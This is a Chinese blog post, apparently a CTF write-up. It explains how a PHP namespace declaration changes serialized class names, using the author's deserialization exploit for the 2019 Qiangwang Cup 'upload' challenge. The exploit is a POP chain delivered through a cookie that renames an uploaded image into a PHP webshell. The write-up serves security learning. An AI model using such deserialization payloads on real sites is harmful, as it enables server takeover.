<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="theme-color" content="#000000"><meta name="author" content="Sevenstar"><meta name="copyright" content="Sevenstar"><meta name="generator" content="Hexo 5.4.0"><meta name="theme" content="hexo-theme-yun"><title>浅谈PHP命名空间对于反序列化漏洞利用的影响 | whocansee的博客</title><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Serif+SC:wght@900&amp;display=swap" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/star-markdown-css@0.1.25/dist/yun/yun-markdown.min.css"><script src="//at.alicdn.com/t/font_1140697_dxory92pb0h.js" async></script><script src="https://cdn.jsdelivr.net/npm/scrollreveal/dist/scrollreveal.min.js" defer></script><script>document.addEventListener("DOMContentLoaded", () => {
  [".post-card",".post-content img"].forEach((target)=> {
    ScrollReveal().reveal(target);
  })
});
</script><link rel="icon" href="/yun.svg"><link rel="mask-icon" href="/yun.svg" color="#000000"><link rel="alternate icon" href="/yun.ico"><link rel="preload" href="/css/hexo-theme-yun.css" as="style"><link rel="preload" href="/js/utils.js" as="script"><link rel="preload" href="/js/hexo-theme-yun.js" as="script"><link rel="prefetch" href="/js/sidebar.js" as="script"><link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin><script id="yun-config">
    const Yun = window.Yun || {};
    window.CONFIG = {"hostname":"whocansee.github.io","root":"/","title":"Just","version":"1.6.2","mode":"light","copycode":true,"page":{"isPost":true},"i18n":{"placeholder":"搜索...","empty":"找不到您查询的内容: ${query}","hits":"找到 ${hits} 条结果","hits_time":"找到 ${hits} 条结果（用时 ${time} 毫秒）"},"anonymous_image":"https://cdn.jsdelivr.net/gh/YunYouJun/cdn/img/avatar/none.jpg","say":{"api":"/data/sentences.json"},"local_search":{"path":"/search.xml"},"fireworks":{"colors":["52, 67, 221","23, 181, 125","33, 78, 94"]}};
  </script><link rel="stylesheet" href="/css/hexo-theme-yun.css"><script src="/js/utils.js"></script><script src="/js/hexo-theme-yun.js"></script><link rel="stylesheet" href="http://fonts.googleapis.com/css2?family=Noto+Serif+SC:wght@900&amp;display=swap"><meta name="description" content="想到就写了.md">
<meta property="og:type" content="article">
<meta property="og:title" content="浅谈PHP命名空间对于反序列化漏洞利用的影响">
<meta property="og:url" content="https://whocansee.github.io/2023/04/09/%E6%B5%85%E8%B0%88PHP%E5%91%BD%E5%90%8D%E7%A9%BA%E9%97%B4%E5%AF%B9%E4%BA%8E%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E7%9A%84%E5%BD%B1%E5%93%8D/index.html">
<meta property="og:site_name" content="whocansee的博客">
<meta property="og:description" content="想到就写了.md">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="c:/Users/who">
<meta property="og:image" content="c:/Users/who">
<meta property="article:published_time" content="2023-04-09T11:24:19.000Z">
<meta property="article:modified_time" content="2023-04-09T12:23:14.281Z">
<meta property="article:author" content="Sevenstar">
<meta property="article:tag" content="安全 PHP 反序列化">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="c:/Users/who"></head><body><script defer src="https://cdn.jsdelivr.net/npm/animejs@latest"></script><script defer src="/js/ui/fireworks.js"></script><canvas class="fireworks"></canvas><div class="container"><a class="sidebar-toggle hty-icon-button" id="menu-btn"><div class="hamburger hamburger--spin" type="button"><span class="hamburger-box"><span class="hamburger-inner"></span></span></div></a><div class="sidebar-toggle sidebar-overlay"></div><aside class="sidebar"><script src="/js/sidebar.js"></script><ul class="sidebar-nav"><li class="sidebar-nav-item sidebar-nav-toc hty-icon-button" data-target="post-toc-wrap" title="文章目录"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-list-ordered"></use></svg></li><li class="sidebar-nav-item sidebar-nav-overview hty-icon-button sidebar-nav-active" data-target="site-overview-wrap" title="站点概览"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-passport-line"></use></svg></li></ul><div class="sidebar-panel sidebar-panel-active" id="site-overview-wrap"><div class="site-info mickey-mouse"><a class="site-author-avatar" href="/about/" title="Sevenstar"><img width="96" loading="lazy" src="/images/kkkkkkkkkkkkkkk.png" alt="Sevenstar"></a><div class="site-author-name"><a href="/about/">Sevenstar</a></div><span class="site-name">whocansee的博客</span><sub class="site-subtitle">最爱冷晴天</sub><div class="site-desciption">cool weather, cool life</div></div><nav class="site-state"><a class="site-state-item hty-icon-button icon-home" href="/" title="首页"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-home-4-line"></use></svg></span></a><div class="site-state-item"><a href="/archives/" title="归档"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-archive-line"></use></svg></span><span class="site-state-item-count">10</span></a></div><div class="site-state-item"><a href="/categories/" title="分类"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-folder-2-line"></use></svg></span><span class="site-state-item-count">2</span></a></div><div class="site-state-item"><a href="/tags/" title="标签"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="site-state-item-count">6</span></a></div><a class="site-state-item hty-icon-button" target="_blank" rel="noopener" href="https://yun.yunyoujun.cn" title="主题文档"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-settings-line"></use></svg></span></a></nav><hr style="margin-bottom:0.5rem"><div class="links-of-author"><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://github.com/whocansee" title="GitHub" target="_blank" style="color:#6e5494"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-github-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://user.qzone.qq.com/786366421" title="QQ 786366421" target="_blank" style="color:#12B7F5"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-qq-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://space.bilibili.com/263103748" title="哔哩哔哩" target="_blank" style="color:#FF8EB3"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-bilibili-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://mail.qq.com/" title="E-Mail:786366421@qq.com" target="_blank" style="color:#8E71C1"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-mail-line"></use></svg></a></div><hr style="margin:0.5rem 1rem"><div class="links"><a class="links-item hty-icon-button" href="/links/" title="我的小伙伴们" style="color:dodgerblue"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-genderless-line"></use></svg></a></div></div><div class="sidebar-panel" id="post-toc-wrap"><div class="post-toc"><div class="post-toc-content">此文章未包含目录</div></div></div><div class="tag-cloud"><div class="tag-cloud-tags"><a href="/tags/JNDI%E6%B3%A8%E5%85%A5-Java%E5%AE%89%E5%85%A8-%E5%A8%B1%E4%B9%90%E7%9F%A5%E8%AF%86/" style="font-size: 12px; color: #999">JNDI注入 Java安全 娱乐知识</a> <a href="/tags/Misc-%E8%A7%A3%E9%A2%98%E6%8A%A5%E5%91%8A-CTF/" style="font-size: 12px; color: #999">Misc 解题报告 CTF</a> <a href="/tags/%E5%AE%89%E5%85%A8-PHP-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" style="font-size: 12px; color: #999">安全 PHP 反序列化</a> <a href="/tags/%E5%AE%89%E5%85%A8-SQL%E6%B3%A8%E5%85%A5-python/" style="font-size: 12px; color: #999">安全 SQL注入 python</a> <a href="/tags/%E6%8A%80%E6%9C%AF-%E5%8D%9A%E5%AE%A2-%E8%87%AA%E5%8A%A8%E9%83%A8%E7%BD%B2/" style="font-size: 12px; color: #999">技术 博客 自动部署</a> <a href="/tags/%E6%97%A5%E5%B8%B8-%E5%9B%9E%E5%BF%86-%E6%84%9F%E6%83%B3/" style="font-size: 12px; color: #999">日常 回忆 感想</a></div></div></aside><main class="sidebar-translate" id="content"><div id="post"><article class="hty-card post-block" itemscope itemtype="https://schema.org/Article"><link itemprop="mainEntityOfPage" href="https://whocansee.github.io/2023/04/09/%E6%B5%85%E8%B0%88PHP%E5%91%BD%E5%90%8D%E7%A9%BA%E9%97%B4%E5%AF%B9%E4%BA%8E%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E7%9A%84%E5%BD%B1%E5%93%8D/"><span hidden itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Sevenstar"><meta itemprop="description"></span><span hidden itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><meta itemprop="name" content="whocansee的博客"></span><header class="post-header"><h1 class="post-title" itemprop="name headline">浅谈PHP命名空间对于反序列化漏洞利用的影响</h1><div class="post-meta"><div class="post-time" style="display:block"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-calendar-line"></use></svg></span> <time title="创建时间：2023-04-09 19:24:19" itemprop="dateCreated datePublished" datetime="2023-04-09T19:24:19+08:00">2023-04-09</time></div><span class="post-count"><span class="post-symbolcount"><span class="post-meta-item-icon" title="本文字数"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-file-word-line"></use></svg></span> <span title="本文字数">615</span><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="阅读时长"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-timer-line"></use></svg></span> <span title="阅读时长">2m</span></span></span><div class="post-classify"><span class="post-category"> <span class="post-meta-item-icon" style="margin-right:3px;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-folder-line"></use></svg></span><span itemprop="about" itemscope itemtype="https://schema.org/Thing"><a class="category-item" href="/categories/%E6%8A%80%E6%9C%AF/" style="--text-color:var(--hty-text-color)" itemprop="url" rel="index"><span itemprop="text">技术</span></a></span></span><span class="post-tag"><span class="post-meta-divider">-</span><a class="tag-item" href="/tags/%E5%AE%89%E5%85%A8-PHP-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" style="--text-color:var(--hty-text-color)"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="tag-name">安全 PHP 反序列化</span></a></span></div><div class="post-author"><span class="author-name">whocansee</span></div></div></header><section class="post-body" itemprop="articleBody"><div class="post-content markdown-body" style="--smc-primary:#000000;"><p>今天做了一道BUU上收录的2019强网杯upload，解题过程中拿到了题目源码，里面有个函数会对cookie进行反序列化，基本思路就是利用反序列化和源码中的魔术方法构造POP链进入upload_img函数绕过对上传文件的强制命名，从而拿到webshell</p>
<p>结果EXP都写好了，生成的字符串换到Cookie里面刷新却没能成功，找了别人的EXP过来对比自己也看不出哪里不一样，但是把别人的拿来用又行了，怎么会是呢？以下是我最开始写的EXP</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Register</span></span>&#123;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$checker</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$registed</span> = <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Profile</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$checker</span>=<span class="number">0</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$filename_tmp</span>=<span class="string">&#x27;./upload/f9e1016a5cec370aae6a18d438dabfa5/1741b019882cc15c136b1977bcd295bc.png&#x27;</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$filename</span>=<span class="string">&#x27;./upload/f9e1016a5cec370aae6a18d438dabfa5/shedsall.php&#x27;</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$ext</span>=<span class="number">1</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$except</span> = <span class="keyword">array</span>(<span class="string">&#x27;index&#x27;</span>=&gt;<span class="string">&#x27;upload_img&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$a</span> = <span class="keyword">new</span> Register();</span><br><span class="line"><span class="variable">$a</span>-&gt;checker = <span class="keyword">new</span> Profile();</span><br><span class="line"><span class="keyword">echo</span> base64_encode(serialize(<span class="variable">$a</span>));</span><br></pre></td></tr></table></figure>

<p>擦亮眼睛仔细对比后，我发现了自己写的EXP和别人的不同之处，他们的EXP开头都有一行代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">namespace</span> <span class="title">app</span>\<span class="title">web</span>\<span class="title">controller</span>;</span><br></pre></td></tr></table></figure>

<p>namespace的作用是分配命名空间，可以起到防止变量、函数、类名重复的效果，runoob上有一篇专门讲PHP中的命名空间的文章很不错：</p>
<p><a target="_blank" rel="noopener" href="https://www.runoob.com/w3cnote/php-namespace-intro.html">https://www.runoob.com/w3cnote/php-namespace-intro.html</a></p>
<p>其中提到了当调用其它命名空间（如test）下的类名(如Register)时，需要使用<strong>\test\Register</strong> ：一种像文件路径的语法： <strong>\空间名\元素名</strong></p>
<p>而当我们用echo输出对EXP添加命名空间前后的序列化字符串时，也能发现其中的不同（上面的结果是不添加Namespace的，下面的反之）<img src="C:\Users\who'can'se'e\AppData\Roaming\Typora\typora-user-images\image-20230409201602246.png" alt="image-20230409201602246" loading="lazy"></p>
<p>类名从<strong>Register</strong>变成了<strong>app\web\controller\Register</strong>，即<strong>\空间名\元素名</strong>的语法，所以说<strong>序列化后的字符串是会受到namespace影响的</strong>。</p>
<p>那么问题来了，为什么我们一定要添加这行代码声明命名空间才能执行成功呢？我翻了翻题目源码：<img src="C:\Users\who'can'se'e\AppData\Roaming\Typora\typora-user-images\image-20230409202024875.png" alt="image-20230409202024875" loading="lazy"></p>
<p>原来是题目源码中规定好了这样的命名空间，所以也只有声明了同样命名空间的EXP才能生成有效的序列化字符串，不然类名都不同了。</p>
<p>这种疏忽完全来源于基础的薄弱……但是边做边学效率才是最高的，嗯…我认错但还是不改。</p>
<p>事情到这里就算告一段落，我写下这篇博客后也心满意足地看比赛去了~</p>
</div><ul class="post-copyright"><li class="post-copyright-author"><strong>本文作者：</strong>whocansee</li><li class="post-copyright-link"><strong>本文链接：</strong><a href="https://whocansee.github.io/2023/04/09/%E6%B5%85%E8%B0%88PHP%E5%91%BD%E5%90%8D%E7%A9%BA%E9%97%B4%E5%AF%B9%E4%BA%8E%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E7%9A%84%E5%BD%B1%E5%93%8D/" title="浅谈PHP命名空间对于反序列化漏洞利用的影响">https://whocansee.github.io/2023/04/09/%E6%B5%85%E8%B0%88PHP%E5%91%BD%E5%90%8D%E7%A9%BA%E9%97%B4%E5%AF%B9%E4%BA%8E%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E7%9A%84%E5%BD%B1%E5%93%8D/</a></li><li class="post-copyright-license"><strong>版权声明：</strong>本博客所有文章除特别声明外，均默认采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank" rel="noopener" title="CC BY-NC-SA 4.0 "><svg class="icon"><use xlink:href="#icon-creative-commons-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-by-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-nc-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-sa-line"></use></svg></a> 许可协议。</li></ul></section></article><div class="post-nav"><div class="post-nav-item"><a class="post-nav-prev" href="/2024/03/19/%E6%B5%85%E8%B0%88trustURLCodebase%E9%99%90%E5%88%B6%E7%9A%84%E8%A7%A3%E9%99%A4/" rel="prev" title="浅谈trustURLCodebase限制的解除"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-left-s-line"></use></svg><span class="post-nav-text">浅谈trustURLCodebase限制的解除</span></a></div><div class="post-nav-item"><a class="post-nav-next" href="/2023/02/13/%E6%B5%85%E8%B0%88SQL%E8%AF%AD%E5%8F%A5%E4%B8%8D%E5%8C%BA%E5%88%86%E5%A4%A7%E5%B0%8F%E5%86%99%E7%9A%84%E7%89%B9%E6%80%A7%E4%B8%8E%E7%9B%B2%E6%B3%A8%E8%84%9A%E6%9C%AC%E7%A2%B0%E6%92%9E%E6%89%80%E4%BA%A7%E7%94%9F%E7%9A%84%E4%B8%80%E4%B8%AA%E5%9D%91/" rel="next" title="浅谈SQL语句不区分大小写的特性与盲注脚本碰撞所产生的一个坑"><span class="post-nav-text">浅谈SQL语句不区分大小写的特性与盲注脚本碰撞所产生的一个坑</span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-right-s-line"></use></svg></a></div></div></div><div class="hty-card" id="comment"><div class="comment-tooltip text-center"><span>要不要和我说些什么？</span><br></div></div></main><footer class="sidebar-translate" id="footer"><div class="copyright"><span>&copy; 2021 – 2024 </span><span class="with-love" id="animate"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-cloud-line"></use></svg></span><span class="author"> Sevenstar</span></div><div class="powered"><span>由 <a href="https://hexo.io" target="_blank" rel="noopener">Hexo</a> 驱动 v5.4.0</span><span class="footer-separator">|</span><span>主题 - <a rel="noopener" href="https://github.com/YunYouJun/hexo-theme-yun" target="_blank"><span>Yun</span></a> v1.6.2</span></div><div class="live_time"><span>欸嘿,本博客已运行</span><span id="display_live_time"></span><span class="moe-text">(●'◡'●)</span><script>function blog_live_time() {
  setTimeout(blog_live_time, 1000);
  const start = new Date('2021-09-23T00:00:00');
  const now = new Date();
  const timeDiff = (now.getTime() - start.getTime());
  const msPerMinute = 60 * 1000;
  const msPerHour = 60 * msPerMinute;
  const msPerDay = 24 * msPerHour;
  const passDay = Math.floor(timeDiff / msPerDay);
  const passHour = Math.floor((timeDiff % msPerDay) / 60 / 60 / 1000);
  const passMinute = Math.floor((timeDiff % msPerHour) / 60 / 1000);
  const passSecond = Math.floor((timeDiff % msPerMinute) / 1000);
  display_live_time.innerHTML = " " + passDay + " 天 " + passHour + " 小时 " + passMinute + " 分 " + passSecond + " 秒";
}
blog_live_time();
</script></div><div class="footer-custom-text">Hosted by Github</div></footer><a class="hty-icon-button" id="back-to-top" aria-label="back-to-top" href="#"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-up-s-line"></use></svg><svg class="progress-circle-container" viewBox="0 0 100 100"><circle class="progress-circle" id="progressCircle" cx="50" cy="50" r="48" fill="none" stroke="#000000" stroke-width="2" stroke-linecap="round"></circle></svg></a><a class="popup-trigger hty-icon-button icon-search" id="search" href="javascript:;" title="搜索"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-search-line"></use></svg></span></a><script>window.addEventListener("DOMContentLoaded", () => {
  // Handle and trigger popup window
  document.querySelector(".popup-trigger").addEventListener("click", () => {
    document.querySelector(".popup").classList.add("show");
    setTimeout(() => {
      document.querySelector(".search-input").focus();
    }, 100);
  });

  // Monitor main search box
  const onPopupClose = () => {
    document.querySelector(".popup").classList.remove("show");
  };

  document.querySelector(".popup-btn-close").addEventListener("click", () => {
    onPopupClose();
  });

  window.addEventListener("keyup", event => {
    if (event.key === "Escape") {
      onPopupClose();
    }
  });
});
</script><script src="/js/search/local-search.js" defer></script><div class="popup search-popup"><div class="search-header"><span class="popup-btn-close close-icon hty-icon-button"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-close-line"></use></svg></span></div><div class="search-input-container"><input class="search-input" id="local-search-input" type="text" placeholder="搜索..." value=""></div><div id="local-search-result"></div></div><script>const date = new Date();
const today = (date.getMonth() + 1) + "-" + date.getDate()
const mourn_days = ["4-4","9-18","7-7","12-13"]
if (mourn_days.includes(today)) {
  document.documentElement.style.filter = "grayscale(1)";
}</script></div></body></html>